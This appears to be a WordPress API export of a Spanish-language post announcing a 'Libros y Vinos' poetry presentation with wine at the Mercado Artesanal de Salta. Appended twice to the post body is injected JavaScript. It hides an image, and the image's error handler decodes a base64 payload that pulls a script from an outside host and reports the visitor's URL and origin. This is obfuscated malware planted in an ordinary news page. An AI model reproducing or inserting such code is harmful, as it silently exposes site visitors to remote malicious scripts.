{"id":2973,"date":"2023-08-09T13:37:05","date_gmt":"2023-08-09T16:37:05","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2973"},"modified":"2025-08-14T00:10:47","modified_gmt":"2025-08-14T03:10:47","slug":"se-realizara-una-nueva-edicion-de-libros-y-vinos-en-el-mercado-artesanal-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2973","title":{"rendered":"Se realizar\u00e1 una nueva edici\u00f3n de Libros y Vinos en el Mercado Artesanal de Salta"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#5e0526\"><em>El viernes 11 de agosto a las 19 horas, se presentar\u00e1n los libros \u00abArpegios\u00bb de Hilda Eve Ruiz de N\u00fa\u00f1ez y \u00abDe la mano de mi padre\u00bb de Nelly Mormina. Se compartir\u00e1 vino mistela con los presentes. Entrada gratuita.<\/em><\/h4>\n\n\n\n<p>El Mercado Artesanal de Salta en forma conjunta con la Sociedad Argentina de Escritores filial Salta, llevan a cabo la iniciativa \u201cLibros y Vinos\u201d, una propuesta que propicia un ambiente agradable de lectura, permitiendo al p\u00fablico emprender un viaje literario en el que el vino y el libro se unen para relajar y disfrutar las obras.<\/p>\n\n\n\n<p>La cita ser\u00e1 el viernes 11 de agosto a las 19 horas en el Sal\u00f3n de Usos M\u00faltiples \u201cMar\u00eda Gertrudis Medeiros\u201d del Mercado Artesanal, Av. San Mart\u00edn 2555, con entrada gratuita.<\/p>\n\n\n\n<p>En esta oportunidad, Hilda Eve Ruiz de N\u00fa\u00f1ez presenta su libro \u00abArpegios\u00bb, un conjunto de poemas de amor, hacia la vida y la eternidad de los sentimientos.<\/p>\n\n\n\n<p>Por su parte, Nelly Mormina presenta \u00abDe la mano de mi padre\u00bb, un libro de poemas dedicado a la memoria de su padre, donde recupera los tiernos recuerdos de la infancia.<\/p>\n\n\n\n<p>Durante el evento, el Mercado Artesanal ofrecer\u00e1 vino mistela a los presentes.<\/p>\n\n\n\n<p><strong>Sobre las autoras<\/strong><br>&nbsp;<br>Nelly Mormina, es poeta y secretaria general de actas de la Sociedad Argentina de Escritores- Sade Filial Salta.<\/p>\n\n\n\n<p>Hilda Eve Ruiz de N\u00fa\u00f1ez, es poeta y escritora, socia de la Sociedad Argentina de Escritores- Sade Filial Salta y actualmente vive en Campo Santo, localidad de General G\u00fcemes.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-realizara-una-nueva-edicion-de-libros-y-vinos-en-el-mercado-artesanal-de-salta-91129\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El viernes 11 de agosto a las 19 horas, se presentar\u00e1n los libros \u00abArpegios\u00bb de Hilda Eve Ruiz de N\u00fa\u00f1ez y \u00abDe la mano de mi padre\u00bb de Nelly Mormina. Se compartir\u00e1 vino mistela con los presentes. Entrada gratuita. El Mercado Artesanal de Salta en forma conjunta con la Sociedad Argentina de Escritores filial Salta, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2974,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[24,26,11,18],"tags":[],"class_list":{"0":"post-2973","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-bodegas","8":"category-culturales","9":"category-datos-utiles","10":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2973"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2973"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2973\/revisions"}],"predecessor-version":[{"id":6997,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2973\/revisions\/6997"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2974"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2973"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2973"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2973"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}